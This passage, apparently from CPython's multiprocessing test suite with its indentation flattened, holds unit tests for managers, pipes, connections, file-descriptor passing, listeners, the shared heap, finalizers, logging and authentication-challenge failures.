ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
